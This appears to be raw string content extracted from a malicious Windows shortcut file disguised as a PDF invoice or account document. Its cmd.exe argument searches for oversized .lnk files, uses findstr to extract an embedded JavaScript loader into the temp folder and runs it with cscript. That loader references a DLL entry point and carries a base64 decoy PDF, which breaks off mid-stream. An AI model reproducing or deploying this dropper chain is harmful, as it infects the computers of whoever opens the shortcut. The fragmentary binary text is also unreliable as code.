Windows
System32
cmd.exe
C:\Windows\System32\cmd.exe
%ComSpec%
win-5jkmu7vuhc3
var onm='\\account.pdf';var jsn='~254134656.js';var rdn='MSADOCG.DLL';var def='DllUnregisterServer';var ofs='JVBERi0xLjQKJdPr6eEKMSAwIG9iago8PC9DcmVhdG9yIChNb3ppbGxhLzUuMCBcKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NFwpIEFwcGxlV2ViS2l0LzUzNy4zNiBcKEtIVE1MLCBsaWtlIEdlY2tvXCkgQ2hyb21lLzExNi4wLjAuMCBTYWZhcmkvNTM3LjM2KQovUHJvZHVjZXIgKFNraWEvUERGIG0xMTYpCi9DcmVhdGlvbkRhdGUgKEQ6MjAyMzA5MDYwNjM0NTMrMDAnMDAnKQovTW9kRGF0ZSAoRDoyMDIzMDkwNjA2MzQ1MyswMCcwMCcpPj4KZW5kb2JqCjMgMCBvYmoKPDwvY2EgMQovQk0gL05vcm1hbD4+CmVuZG9iago4IDAgb2JqCjw8L1R5cGUgL0Fubm90Ci9TdWJ0eXBlIC9MaW5rCi9GIDQKL0JvcmRlciBbMCAwIDBdCi9SZWN0IFs0NC4wMjc5MjcgNTc5Ljk4NzA2IDI0OC40MDc4MiA2MDguNTQwMV0KL0EgPDwvVHlwZSAvQWN0aW9uCi9TIC9VUkkKL1VSSSAobWFpbHRvOmthKioqKjlAb3V0bG9vay5jb20pPj4KL1N0cnVjdFBhcmVudCAxMDAwMDA+PgplbmRvYmoKOSAwIG9iago8PC9GaWx0ZXIgL0ZsYXRlRGVjb2RlCi9MZW5ndGggODI3Pj4gc3RyZWFtCnicrVfbitswFHz3V+i5UOXcpCPBshDnsvRhoS2BfkAvC4UtdPv/0BPbcRxnI6tsE5zEjjwajc6MZE+cu5cDe7/3k9Mk6DPmnNzX5+Z3gwQ+MTMlN/lJZK1ijOqYInlGVvfyvfnyzv2ye6KniJFT7NDPZ69jWTceIWQ3/fz84K4vvjw1qwd2T3+
Windows
System32
cmd.exe
!..\..\..\Windows\System32\cmd.exe
/c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk %temp%\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > %temp%\~254134656.js & cscript %temp%\~254134656.js 9&exit))&cls
.\762403968.pdf
%ComSpec%
S-1-5-21-3618714614-4219670420-1659557965-500